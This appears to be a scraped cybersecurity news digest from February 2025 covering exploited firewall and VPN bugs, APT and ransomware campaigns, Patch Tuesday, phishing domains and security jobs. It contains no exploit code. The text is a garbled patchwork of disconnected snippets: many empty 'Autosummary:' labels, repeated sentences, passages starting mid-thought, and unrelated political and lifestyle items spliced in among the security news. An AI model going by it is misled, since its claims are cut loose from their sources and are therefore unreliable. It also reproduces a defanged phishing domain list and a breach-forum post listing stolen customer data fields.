Attackers exploit recently disclosed Palo Alto Networks PAN-OS firewalls bug Pierluigi Paganini February 15, 2025 February 15, 2025 Threat actors are exploiting a recently disclosed vulnerability, tracked as CVE-2025-0108, in Palo Alto Networks PAN-OS firewalls. "2024 is set to be a record year for scammers who received at least US$9.9 billion in crypto revenues from their illicit activities, according to Chainalysis. This figure is projected to rise to an all-time high of $12.4 billion as ongoing analysis uncovers more fraudulent activity. These findings are part of Chainalysis’ research into scams, highlighting high-yield investment scams (50%) and pig butchering (33%) as the two most prevalent fraud and scams. Pig butchering scams … More
The post Pig butchering scams are exploding appeared first on Help Net Security.
"Autosummary:
Pig butchering scams surge in 2024 Interestingly, despite pulling in half of all scam revenue in 2024, high-yield investment scam inflows declined by 36% YoY. On the other hand, pig butchering revenue increased by almost 40% YoY, and the number of deposits to pig butchering scams grew nearly 210% YoY, potentially indicating an expansion of the victim pool. "Autosummary:
"Autosummary:
"Autosummary:
Valve removed the game PirateFi from the Steam video game platform because contained a malware Pierluigi Paganini February 14, 2025 February 14, 2025 Valve removed a game from Steam because it contained malware, the company also warned affected users to reformat their operating systems. "Autosummary:
"Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns," the PostgreSQL security team explains. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"After gaining access into the environment and performing reconnaissance, these tunneling tools are strategically deployed on critical network devices, including ESXi hosts, Windows hosts, VPN appliances, and network attached storage (NAS) devices," Sygnia researchers said. "RansomHub has targeted over 600 organizations globally, spanning sectors such as healthcare, finance, government, and critical infrastructure, firmly establishing it as the most active ransomware group in 2024," Group-IB analysts said in an exhaustive report published this week. "Autosummary:
This security flaw (CVE-2024-53704), tagged by CISA as critical severity and found in the SSLVPN authentication mechanism, impacts SonicOS versions 7.1.x (up to 7.1.1-7058), 7.1.2-7019, and 8.0.0-8035, used by multiple models of Gen 6 and Gen 7 firewalls and SOHO series devices. "Autosummary:
"If you are one of the players who downloaded this "game": Consider the credentials, session cookies and secrets saved in your browser, email client, cryptocurrency wallets etc. compromised," advises SECUINFRA. "Autosummary:
If you have high reputation and want the source code send a PM Breached by @Jurak and @StableFish Below is a sample of the customers database: CLUE , HINT , PASSWORD , USERNAME , LAST_NAME , FIRST_NAME , CUSTOMER_ID , DATE_REGISTERED , DATE_UPDATED , DISPLAY_NAME , FIRM_NAME , TIMEZONE_CODE , LAST_PASSWORD_CHANGE” BleepingComputer says it has reached out to Zacks on several occasions but didn’t get a response.The data contains names, email addresses, usernames, passwords, phone numbers, addresses, company names, and additional personal information. In October 2024, we found data reported to belong to Zacks containing 8,441 records which includes email addresses, physical addresses, phone numbers, and full names, and potentially other compromised user details. "Autosummary:
"Autosummary:
Put differently, the name confusion attack requires the below three conditions to be met when a victim retrieves the AMI ID through the API - Use of the name filter, A failure to specify either the owner, owner-alias, or owner-id parameters, Fetching the most the recently created image from the returned list of matching images ("most_recent=true") This leads to a scenario where an attacker can create a malicious AMI with a name that matches the pattern specified in the search criteria, resulting in the creation of an EC2 instance using the threat actor"s doppelgänger AMI. "Autosummary:
At the end of January, Horizon3 researchers discovered three vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, that could be used to compromise a SimpleHelp server, as well as clients machines being managed by SimpleHelp. "Autosummary:
China-linked APT Salt Typhoon breached telecoms by exploiting Cisco router flaws Pierluigi Paganini February 14, 2025 February 14, 2025 China-linked APT Salt Typhoon has breached more U.S. telecommunications providers via unpatched Cisco IOS XE network devices. “The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s (ASD’s) "Autosummary:
"Autosummary:
"If you are one of the players who downloaded this "game": Consider the credentials, session cookies and secrets saved in your browser, email client, cryptocurrency wallets etc. compromised," advises SECUINFRA. "Autosummary:
We have a right to work, and these Pablo T-shirts especially always sell well," says Joana Montoya, who owns a stall stocked full of Escobar merchandise in Comuna 13, a popular tourist zone of Medellín."Difficult issues that are part of the history and memory of our country cannot simply be remembered by a T-shirt, or a sticker sold on a street corner," says Juan Sebastián Gómez, Congress member and co-author of the bill.It helps us pay our rent, buy food, look after our kids," says Ms Montaya, who supports herself and her young daughter. "Autosummary:
"While the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign owners exhibited poor campaign management and inconsistent evasion practices," security researchers Andrew Pease and Seth Goodwin said in a technical analysis. "Autosummary:
"Autosummary:
The attacks took place between December 4, 2024, and January 23, 2025, Recorded Future"s Insikt Group said, adding the adversary, also tracked as Earth Estries, FamousSparrow, GhostEmperor, RedMike, and UNC2286, attempted to exploit more than 1,000 Cisco devices globally during the timeframe. "Autosummary:
"Autosummary:
“During the attack in late 2024, the attacker deployed a distinct toolset that had previously been used by a China-linked actor in classic espionage attacks,” the researchers say, adding that "tools associated with China-based espionage groups are often shared resources" but "many aren’t publicly available and aren’t usually associated with cybercrime activity.” "Autosummary:
If port operations were to shut down due to a successful cyber attack, the impact to the local economy "could reach $2 billion per day", Long Beach Port CEO Mario Cordero told CBS News this week, as it investigated the threat of Chinese-manufactured ship-to-share cranes being vulnerable to hackers. "North Korean state-sponsored group Kimsuky (aka Emerald Sleet, aka VELVET CHOLLIMA) is attempting to deliver malware to South Korean targets by leveraging the so-called “ClickFix” tactic. A relatively new tactic The ClickFix social engineering tactic has been dubbed thus because of the initial pretext used by malware peddlers: the users, wanting to read a webpage or document or join a video call, are shown a fake browser notice saying that the page or doc cannot … More
The post North Korean hackers spotted using ClickFix tactic to deliver malware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima. "Autosummary:
China-linked APTs’ tool employed in RA World Ransomware attack Pierluigi Paganini February 13, 2025 February 13, 2025 A November 2024 RA World ransomware attack on an Asian software firm used a tool linked to China-linked threat actors. "Autosummary:
Use multi-factor authentication (MFA) for all accounts Protect your devices with up-to-date security software (such as Malwarebytes Premium Security), and use text protection and text message filtering on your mobile device. At the time, FBI Special Agent in Charge Robert Tripp said: “Attackers are leveraging AI to craft highly convincing voice or video messages and emails to enable fraud schemes against individuals and businesses alike. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-40891 Zyxel DSL CPE OS Command Injection Vulnerability CVE-2024-40890 Zyxel DSL CPE OS Command Injection Vulnerability CVE-2025-21418 Microsoft Windows "Autosummary:
Microsoft Patch Tuesday security updates for February 2025 ficed 2 actively exploited bugs Pierluigi Paganini February 12, 2025 February 12, 2025 Microsoft Patch Tuesday security updates for February 2025 addressed four zero-day flaws, two of which are actively exploited in the wild. "Autosummary:
" The billionaire technology entrepreneur, who himself was appointed and not elected, described federal workers as an "unelected, fourth, unconstitutional branch of government" that he said has "more power than any elected representative". "Autosummary:
com-etsy-verify[.]cfd etsy-car[.]switchero[.]cfd etsy[.]1562587027[.]cfd etsy[.]3841246[.]cfd etsy[.]39849329[.]cfd etsy[.]447385638[.]cfd etsy[.]57434[.]cfd etsy[.]5847325245[.]cfd etsy[.]6562587027[.]cfd etsy[.]6841246[.]cfd etsy[.]72871[.]cfd etsy[.]7562587027[.]cfd etsy[.]8841246[.]cfd etsy[.]92875[.]cfd etsy[.]9438632572[.]cfd etsy[.]948292[.]cfd etsy[.]97434[.]cfd etsy[.]984323[.]cfd etsy[.]checkid1573[.]cfd etsy[.]chekup-out[.]cfd etsy[.]coinbox[.]cfd etsy[.]fastpay[.]cfd etsy[.]offer584732[.]cfd etsy[.]offer62785[.]cfd etsy[.]offer684732[.]cfd etsy[.]paylink[.]cfd etsy[.]paymint[.]cfd etsy[.]paywave[.]cfd etsy[.]requlred-verlfication[.]cfd etsy[.]requstlon-verflcation[.]cfd etsy[.]web-proff-point[.]cfd verlflcation-etsy[.]cfd We don’t just report on threats – we help safeguard your entire digital identity Cybersecurity risks should never spread beyond a headline. Despite this, there are still some red flags to look for: The email uses language like “Dear Seller” or “Hello Etsy Member”, instead of addressing you by your Etsy shop name or username The sender’s email address doesn’t end in @etsy.com, or has suspicious variations (extra numbers or letters) "Autosummary:
"Chapman, an American citizen, conspired with overseas IT workers from October 2020 to October 2023 to steal the identities of U.S. nationals and used those identities to apply for remote IT jobs and, in furtherance of the scheme, transmitted false documents to the Department of Homeland Security," the DoJ said. "Autosummary:
The update is notable for fixing two actively exploited flaws - CVE-2025-21391 (CVSS score: 7.1) - Windows Storage Elevation of Privilege Vulnerability (CVSS score: 7.1) - Windows Storage Elevation of Privilege Vulnerability CVE-2025-21418 (CVSS score: 7.8) - Windows "Autosummary:
Microsoft has observed network scans and subsequent exploitation attempts of the following vulnerabilities: CVE-2021-34473 (Microsoft Exchange) CVE-2022-41352 (Zimbra Collaboration Suite) CVE-2023-32315 (OpenFire) CVE-2023-42793 (JetBrains TeamCity) CVE-2023-23397 (Microsoft Outlook) CVE-2024-1709 (ConnectWise ScreenConnect) CVE-2023-48788 (Fortinet FortiClient EMS) After exploiting the above vulnerabilities to obtain access, the hackers established persistence by deploying custom web shells like "LocalOlive". "Autosummary:
"Autosummary:
"Autosummary:
Unimicron added on Sarcoma"s list of victims Source: BleepingComputer Unimicron is a public company manufacturing rigid and flexible PCBs, high-density interconnection (HDI) boards, and integrated circuit (IC) carriers. "Autosummary:
The virtual currency exchange received criminal proceeds from various illegal activities, including computer intrusions, ransomware attacks, identity theft, corruption, and drug distribution. Subsequently, Vinnik returned to Greece before being extradited to the U.S.. “Today’s result shows how the Justice Department, working with international partners, reaches across the globe to combat cryptocrime,” said Deputy Attorney General Lisa Monaco. "Autosummary:
Daily exploitation activity Source: Greynoise The second vulnerability affects the popular open-source file-sharing software and arises from the app"s dependency on a third-party library that exposes PHP environment details through a URL. "Autosummary:
"In this Help Net Security interview, Mike Calvi, CISO at Arvest Bank, discusses building a strong cybersecurity culture within the banking sector. He explains how leadership, effective reporting, and proactive engagement with associates are key in strengthening security. Calvi also touches on how banks can measure success and balance accountability while fostering a collaborative environment.
The post Arvest Bank CISO on building a strong cybersecurity culture in banking appeared first on Help Net Security.
"Autosummary:
Based on their chosen topic, such as cybersecurity, social engineering, fraud, money laundering, physical security, etc., the reporting mechanism auto-routes the submission to the correct team. Additionally, our human risk management (HRM) team does a great job keeping cybersecurity front and center with the associates through internal news articles, intranet banners, and internal chat spaces for cybersecurity collaboration.The awareness, shared by all associates in the bank, that protecting the organization is everyone’s responsibility, not just the Security and IT teams, is becoming the norm. "Application Offensive Security Consultant Sharp Decisions | USA | On-site – View job details As an Application Offensive Security Consultant, you will perform Offensive Security Testing against applications and APIs. Perform application threat hunting to evaluate risk to applications. Perform manual security testing of applications. Provide the vulnerability information in the predefined report format after performing the testing using manual methodology and tools Automotive Cybersecurity Assessor / Engineer UL Solutions | South Korea | On-site … More
The post Cybersecurity jobs available right now: February 11, 2025 appeared first on Help Net Security.
"Autosummary:
Space Segment Security Engineer EUMETSAT | Germany | On-site – View job details As a Space Segment Security Engineer, you will perform routine operations related to spacecraft security, including management, access control and operational use of satellite authentication and encryption keys, and related facilities, across multiple sites and in close cooperation with the spacecraft operations and mission control systems teams. Senior Director of Security, CISO Hiive | Canada | Hybrid – View job details As a Senior Director of Security, CISO, you will define and drive Hiive’s global security vision, aligning security initiatives with business objectives, and ensuring that security is a key enabler for company growth and innovation. Security Engineer Allego | European Union | Remote – View job details As a Security Engineer, you will be responsible for designing and updating the overall cybersecurity strategy, managing security improvement projects, overseeing security testing strategies such as vulnerability scanning and penetration testing, and performing regular threat analysis to stay up-to-date with the current security landscape. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Police dismantled 8Base ransomware gang Pierluigi Paganini February 11, 2025 February 11, 2025 Authorities dismantled the 8Base ransomware gang, shutting down its dark web data leak and negotiation sites. The 8Base ransomware group has been active since March 2022, it focused on small and medium-size businesses in multiple industries, including finance, manufacturing, business services, and IT. "The Thai police has arrested four individuals suspected of being the leaders of the 8Base ransomware group and of stealing approximately $16 million from 1,000+ victims they targeted with the Phobos ransomware. “Officers from Cyber Crime Investigation Bureau, led by Police Lieutenant General Trairong Phiwphan, conducted ‘Operation PHOBOS AETOR’ in Phuket on February 10, arresting four foreign hackers involved in ransomware attacks. The operation, coordinated with Immigration Police and Region 8 Police, raided four locations … More
The post 8Base ransomware group leaders arrested, leak site seized appeared first on Help Net Security.
"Autosummary:
Still, 8Base group claimed several victims in December 2024, including the Croatian port operating company Luka Rijeka, Canadian company Mint Pharmaceuticals, and Japanese manufacturing company Iseki Agricultural Machinery. "Industrial Defender announced its latest platform, Industrial Defender 8.0. This release introduces a completely redesigned risk dashboard, helping critical infrastructure and industrial operators manage security and compliance risks by assessing and prioritizing them with enhanced intelligence and risk scoring. Industrial Defender 8.0 also includes updates to Industrial Defender’s robust policy library, for meeting the very latest in standards and frameworks such as NERC CIP, AESCSF, OTCC, TSA Security Directives, and more. Industrial Defender’s 8.0 platform … More
The post Industrial Defender 8.0 offers detailed view of OT environments appeared first on Help Net Security.
"Autosummary:
ISA/IEC 62443 (International Society of Automation/International Electrotechnical Commission) (International Society of Automation/International Electrotechnical Commission) NIS2 Directive (Network and Information Systems Security Directive) (Network and Information Systems Security Directive) NIST CSF (National Institute of Standards and Technology Cybersecurity Framework) (National Institute of Standards and Technology Cybersecurity Framework) Saudi Arabia’s NCA OTCC (Operational Technology Cybersecurity Compliance) (Operational Technology Cybersecurity Compliance) "Users of iPhones and iPads that run iOS/iPadOS 18 and iPadOS 17 are urged to implement the latest updates to plug a security feature bypass vulnerability (CVE-2025-24200) exploited in the wild in “an extremely sophisticated” attack. The vulnerability (CVE-2025-24200) “A physical attack may disable USB Restricted Mode on a locked device,” Apple explained. USB Restricted Mode is a feature Apple introduced in 2018 to protect users against device unlocking (“cracking”) tools such as
The post Apple fixes zero-day flaw exploited in “extremely sophisticated” attack (CVE-2025-24200) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Fixes were made available in SonicOS 8.0.0-8037 and later, 7.0.1-5165 and higher, 7.1.3-7015 and higher, and 6.5.5.1-6n and higher. "Autosummary:
"Autosummary:
In 2022, a Russian hacker acquired IP addresses from Zservers, which were likely used with LockBit chat servers to coordinate ransomware activities, while, in 2023, Zservers provided infrastructure, including a Russian IP address, to a LockBit affiliate. "Autosummary:
The update is available for: iOS 18.3.1 and iPadOS 18.3.1 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later iPadOS 17.7.5 – iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation If you use any of these then you should install updates as soon as you can. "Autosummary:
Over time, phishing emails have advanced—cybercriminals have stolen credit card details by posing as charities—but so, too, have phishing protections from major email providers, sending many cybercriminal efforts into people’s “spam” inboxes, where the emails are, thankfully, never retrieved.Once the passwords are sold, the new, malicious owners will attempt to use individual passwords for a variety of common online accounts—testing whether, say, an email account password is the same one used for a victim’s online banking system, their mortgage payment platform, or their Social Security portal. Use multifactor authentication on your most sensitive accounts, including your financial, email, social media, healthcare, and government platforms (such as any accounts you use to file taxes). "Autosummary:
The number of bugs in each vulnerability category is listed below: 19 Elevation of Privilege Vulnerabilities 2 Security Feature Bypass Vulnerabilities 22 Remote Code Execution Vulnerabilities 1 Information Disclosure Vulnerabilities 9 Denial of Service Vulnerabilities 3 Spoofing Vulnerabilities The above numbers do not include a critical Microsoft Dynamics 365 Sales elevation of privileges flaw and 10 Microsoft Edge vulnerabilities fixed on February 6. "Autosummary:
Reconnaissance (November 22, 2024 to November 27, 2024) SSL VPN configuration (December 4, 2024 to December 7, 2024) Lateral Movement (December 16, 2024 to December 27, 2024) "Given subtle differences in tradecraft and infrastructure between intrusions, it is possible that multiple individuals or groups may have been involved in this campaign, but jsconsole usage was a common thread across the board," it added. "February 2025 Patch Tuesday is here, and Microsoft has delivered fixes for 56 vulnerabilities, including two zero-days – CVE-2025-21418 and CVE-2025-21391 – under active exploitation. CVE-2025-21418 and CVE-2025-21391 CVE-2025-21418 is a vulnerability in the Windows Ancillary Function Driver (AFD.sys), which interfaces with the Windows Sockets API to enable Windows applications to connect to the internet. It can be exploited by attackers to elevate privileges on the target host. “An authenticated user would need to run … More
The post Microsoft fixes two actively exploited zero-days (CVE-2025-21418, CVE-2025-21391) appeared first on Help Net Security.
"Autosummary:
Other vulnerabilities of note CVE-2025-21194, a security feature bypass vulnerability affecting Microsoft Surface laptops, and CVE-2025-21377, a NTLMv2 hash disclosure vulnerability that could be used by attackers to authenticate as the user, have been marked as “publicly disclosed”. "Autosummary:
Reconnaissance (November 22, 2024 to November 27, 2024) SSL VPN configuration (December 4, 2024 to December 7, 2024) Lateral Movement (December 16, 2024 to December 27, 2024) "Autosummary:
"Autosummary:
CVE-2025-0411 (CVSS score: 7.0) - 7-Zip Mark of the Web Bypass Vulnerability (CVSS score: 7.0) - 7-Zip Mark of the Web Bypass Vulnerability CVE-2022-23748 (CVSS score: 7.8) - Dante Discovery Process Control Vulnerability (CVSS score: 7.8) - Dante Discovery Process Control Vulnerability CVE-2024-21413 (CVSS score: 9.8) - Microsoft Outlook Improper Input Validation Vulnerability (CVSS score: 9.8) - Microsoft Outlook Improper Input Validation Vulnerability CVE-2020-29574 (CVSS score: 9.8) - CyberoamOS (CROS) SQL Injection Vulnerability (CVSS score: 9.8) - CyberoamOS (CROS) SQL Injection Vulnerability CVE-2020-15069 (CVSS score: 9.8) - Sophos XG Firewall Buffer Overflow Vulnerability Last week, Trend Micro revealed that Russian cybercrime outfits are exploiting CVE-2025-0411 to distribute the SmokeLoader malware as part of spear-phishing campaigns targeting Ukrainian entities. "Autosummary:
This week’s list includes — CVE-2025-25064, CVE-2025-25065 (Zimbra Collaboration), CVE-2024-57968, CVE-2025-25181 (Advantive VeraCore), CVE-2025-20124, CVE-2025-20125 (Cisco Identity Services Engine), CVE-2025-23114 (Veeam Backup), CVE-2024-56161 (AMD), CVE-2025-21415 (Azure AI Face Service), CVE-2024-53104 (Linux Kernel/Android), CVE-2022-22706 (Arm), CVE-2025-23369 (GitHub Enterprise Server), PSV-2023-0039, PSV-2024-0117 (NETGEAR), CVE-2025-24118 (Apple), CVE-2025-24648, CVE-2024-43333 (Admin and Site Enhancements plugin), and CVE-2025-24734 (Better Find and Replace plugin).Organizations are also recommended to follow vendor hardening guides, subscribe to vendor notifications and advisories, keep devices always updated, enable centralized logging, enforce multi-factor authentication (MFA), disable unused functionality, maintain detailed device inventories, track configuration changes, detect hardware changes, review security policies, implement role-based access control, and include edge device compromise in their incident response plans.Organizations are also recommended to follow vendor hardening guides, subscribe to vendor notifications and advisories, keep devices always updated, enable centralized logging, enforce multi-factor authentication (MFA), disable unused functionality, maintain detailed device inventories, track configuration changes, detect hardware changes, review security policies, implement role-based access control, and include edge device compromise in their incident response plans.These networks, watchTowr said, originated from the government networks of the U.S., the U.K., Poland, Australia, South Korea, Turkey, Taiwan, and Chile; military networks, Fortune 500 companies, instant messaging platforms, and universities.These networks, watchTowr said, originated from the government networks of the U.S., the U.K., Poland, Australia, South Korea, Turkey, Taiwan, and Chile; military networks, Fortune 500 companies, instant messaging platforms, and universities.Over a period of two months, the cybersecurity company said the buckets in question received more than 8 million HTTP requests for software updates, JavaScript files, virtual machine images, pre-compiled binaries for Windows, Linux, and macOS, and SSL-VPN configurations, among others.Over a period of two months, the cybersecurity company said the buckets in question received more than 8 million HTTP requests for software updates, JavaScript files, virtual machine images, pre-compiled binaries for Windows, Linux, and macOS, and SSL-VPN configurations, among others. — Five Eyes cybersecurity agencies in Australia, Canada, New Zealand, the U.K., and the U.S., along with Czechia and Japan, have released joint guidance for network edge devices, urging device manufacturers to improve forensic visibility by integrating secure-by-default logging to help defenders detect attacks and investigate incidents.Five Eyes Nations Release Guidance for Edge Devices — Five Eyes cybersecurity agencies in Australia, Canada, New Zealand, the U.K., and the U.S., along with Czechia and Japan, have released joint guidance for network edge devices, urging device manufacturers to improve forensic visibility by integrating secure-by-default logging to help defenders detect attacks and investigate incidents. "Autosummary:
"It is likely that the campaign is financially motivated since redirecting users to illegal gambling websites shows that attackers deploy BadIIS for profit," Trend Micro researchers Ted Lee and Lenart Bermejo said in an analysis published last week, Targets of the campaign include IIS servers located in India, Thailand, Vietnam, Philippines, Singapore, Taiwan, South Korea, Japan, and Brazil. "Autosummary:
XE Group shifts from credit card skimming to exploiting zero-days Pierluigi Paganini February 10, 2025 February 10, 2025 The cybercrime group XE Group exploited a VeraCore zero-day to deploy reverse shells, web shells in recent attacks. "Autosummary:
The seizure message also indicates that "Operation Phobos Aetor" involved Thailand, Romania, Bavaria, Germany, Switzerland, Japan, USA, Europol, Czechia, Spain, France, Belgium, and the United Kingdom. "Autosummary:
Its portfolio includes the Buffalo News in New York, the Richmond Times-Dispatch in Virginia, the Arizona Daily Star, the Omaha World-Herald in Nebraska, the Press of Atlantic City, the St. Louis Post-Dispatch in Missouri, the Casper Star-Tribune in Wyoming, and dozens of other media outlets. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
For instance, Texas-based audience producer Gwen Howerton described on Bluesky how she had been duped by an unpaid toll scam after she had driven a rental car on the Dallas North Tollway - and, not being aware of the correct way to pay a toll, had believed the overdue payment demand she received to be genuine. "Autosummary:
"Autosummary:
pic.twitter.com/ER42QQcsLj — Bill Marczak (@billmarczak) February 10, 2025 The zero-day impacts the following devices: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. The vulnerability impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "Autosummary:
The seizure message also indicates that "Operation Phobos Aetor" involved Thailand, Romania, Bavaria, Germany, Switzerland, Japan, USA, Europol, Czechia, Spain, France, Belgium, and the United Kingdom. The police operation, codenamed "Phobos Aetor," led to coordinated raids across four locations, where laptops, smartphones, and cryptocurrency wallets were seized for forensic analysis. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Russian cybercrooks exploiting 7-Zip zero-day vulnerability (CVE-2025-0411) CVE-2025-0411, a Mark-of-the-Web bypass vulnerability in the open-source archiver tool 7-Zip that was fixed in November 2024, has been exploited in zero-day attacks to deliver malware to Ukrainian entities, Trend Micro researchers have revealed. Crypto-stealing iOS, Android malware found on App Store, Google Play A number of iOS and Android apps on Apple’s … More
The post Week in review: Exploited 7-Zip 0-day flaw, crypto-stealing malware found on App Store, Google Play appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Russian cybercrooks exploiting 7-Zip zero-day vulnerability (CVE-2025-0411) CVE-2025-0411, a Mark-of-the-Web bypass vulnerability in the open-source archiver tool 7-Zip that was fixed in November 2024, has been exploited in zero-day attacks to deliver malware to Ukrainian entities, Trend Micro researchers have revealed. New infosec products of the week: February 7, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Dynatrace, Nymi, Qualys, SafeBreach, and Satori. "Autosummary:
"Autosummary:
It’s possible to keep a proactive stance against ransomware by emulating strains—such as LockBit, REvil, Maze, or Conti — to assess how effectively defenses detect, contain, and neutralize these threats. Security validation ensures that credential-based defenses, like MFA, SSO, and account lockout mechanisms, function as intended. Author Bio Aviv Cohen, a seasoned Chief Marketing Officer, is a speaker, cartoonist, and author with over 20 years of experience in product and marketing management. "Autosummary:
"Autosummary:
"Autosummary:
"NSA’s Research Directorate released version 11.3 of Ghidra, an open-source software reverse engineering (SRE) framework. It offers advanced analysis tools, enabling users to dissect and examine compiled code across multiple platforms, including Windows, macOS, and Linux. Ghidra 11.3 is fully backward compatible with project data from previous versions. However, programs and data type archives created or modified in 11.3 will not be compatible with earlier versions of Ghidra. Visual Studio Code Ghidra 11.3 replaces the … More
The post Ghidra 11.3 released: New features, performance improvements, bug fixes appeared first on Help Net Security.
"Autosummary:
Visual Studio Code Ghidra 11.3 replaces the VSCodeProjectScript.java GhidraScript (introduced in 11.2) with two new actions in the CodeBrowser tool: Tools → Create VSCode Module Project… – Sets up a Visual Studio Code project folder with a skeleton module for Ghidra extension development (Plugins, Analyzers, Loaders, etc.), including launchers for debugging and a Gradle task for exporting as a Ghidra extension. Additionally, the release marks a step forward in kernel-level debugging capabilities – Ghidra’s lldb connector now supports macOS kernel debugging, while the dbgeng connector can debug a Windows kernel running in a VM via eXDI, expanding Ghidra’s utility for low-level system analysis. "Autosummary:
"The attack involved the quick and deliberate execution of several post-compromise tactics, techniques and procedures (TTPs) including network and system discovery, administrator account creation, and the establishment of persistence mechanisms, which could have led to the deployment of ransomware," security researchers Ryan Slaney and Daniel Albrecht said. "Autosummary:
On Wednesday, China"s Foreign Affairs spokesman, Lin Jian, said its partnership with Panama was yielding "fruitful results" and urged the country to "resist external interferences. "Autosummary:
"Autosummary:
“If successful exploitation of publicly disclosed keys has occurred, rotating machine keys will not sufficiently address possible backdoors or persistence methods established by a threat actor or other post-exploitation activity, and additional investigation may be warranted.” concludes the report. "Autosummary:
"Autosummary:
External data breaches, meanwhile, are initiated by people outside the organisation - malicious hackers, cybercriminals, or business rivals seeking a competitive advantage. "Autosummary:
"Autosummary:
"Autosummary:
There were also indirectly impacted services that experienced partial failures like Durable Objects, which had a 0.09% error rate increase due to reconnections after recovery, Cache Purge, which saw a 1.8% increase in errors (HTTP 5xx) and 10x latency spike, and Workers & Pages, that had a 0.002% deployment failures, affecting only projects with R2 bindings. "Autosummary:
" The group behind the attack, Cozy Bear (also known as Midnight Blizzard, APT29, and Nobelium), is believed to be part of Russia"s Foreign Intelligence Service (SVR) and has also been linked to other high-profile breaches, including the infamous 2020 SolarWinds supply chain attack. "Autosummary:
The product helps municipalities and infrastructure agencies manage public assets, process work orders, handle permitting and licensing, capital planning, and budgeting, among other things. "Autosummary:
"Autosummary:
"Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Guest: Geoff White Episode links: Sponsored by: Tailscale – Tailscale is perfect for work or personal projects, making networking simple. "Autosummary:
"Chainalysis’ latest report on how the ransomware landscape changed from 2023 to 2024 shows a promising trend: An increasing number of victims refuses to pay the ransom. The total volume of ransom payments decreased year-over-year by approximately 35%, the blockchain analysis firm says. In 2023, victims delivered $1.25 billion to ransomware attackers and data theft and extortion gangs. In 2024, the number fell to $813.55 million. Ransomware payments vs. data leak site victims, 2024 (Source: … More
The post Ransomware payments plummet as more victims refuse to pay appeared first on Help Net Security.
"Autosummary:
On the positive side, law enforcement around the world launched a number of actions that crippled some ransomware gangs: the takedown of LockBit’s infrastructure, the unmasking of the LockBit leader and affiliates, the charging of a LockBit developer, the sentencing of NetWalker affiliates, the charging of the Phobos ransomware administrator, the arrest of the suspected head of Reveton, Ransom Cartel RaaS groups, the disruption of the Radar/Dispossessor ransomware group and, before all that, the disruption of ALPHV/Blackcat leak sites (which was followed by the group’s exit scam in early 2024). "ActiveState launched its Vulnerability Management as a Service (VMaas) offering that revolutionizes how organizations manage open source and accelerates secure software delivery. ActiveState’s Vulnerability Management as a Service combines Application Security Posture Management (ASPM) and Intelligent Remediation capabilities with expert guidance. This solution enables DevSecOps teams to not only identify vulnerabilities in open source packages, but also to automatically prioritize, remediate, and deploy fixes into production without breaking changes, ensuring that applications are truly secured. … More
The post ActiveState accelerates secure software delivery appeared first on Help Net Security.
"Autosummary:
“DevOps teams tell us they spend tens of thousands of hours each year sifting through alerts, researching whether vulnerabilities are reachable and if fixing them might break current functionality, prioritizing what to fix first, and then making sure the work gets done,” said Scott Robertson, CTO, ActiveState. "Autosummary:
This includes SMS messages from Indian banks, bank details, credit and debit card information, and government-issued identification details belonging to about 50,000 users, a majority of whom are located in the Indian states of West Bengal, Bihar, Jharkhand, Karnataka, and Madhya Pradesh. "Autosummary:
Depending on the industry or region, organizations may be subjected to the GDPR, HIPAA, PCI DSS, SOX, DORA, NIS2, and others.These cybersecurity standards, laws, and regulations mandate robust access controls, data protection measures, incident response capabilities, and thorough auditing activities.In the last year alone, 68% of all breaches included a human element, with people being involved either via error, privilege misuse, use of stolen credentials, or social engineering.By addressing pressing challenges such as insider threats, strict regulatory compliance, new types of cyberattacks, and the complexities of hybrid IT environments, PAM ensures that organizations remain resilient in the face of dynamic risks. High-profile incidents, such as the Change Healthcare data breach, in which 190 million records were compromised due to weak third-party access controls, underscore the need for robust PAM solutions. A robust PAM solution ensures that only the right people, at the right time, with the right level of access, can interact with your critical systems — helping you stay resilient and compliant. Note: Syteca also integrates with SIEMs, ticketing systems, and SSO software, allowing you to build a cybersecurity ecosystem tailored to your specific needs. "Autosummary:
"Autosummary:
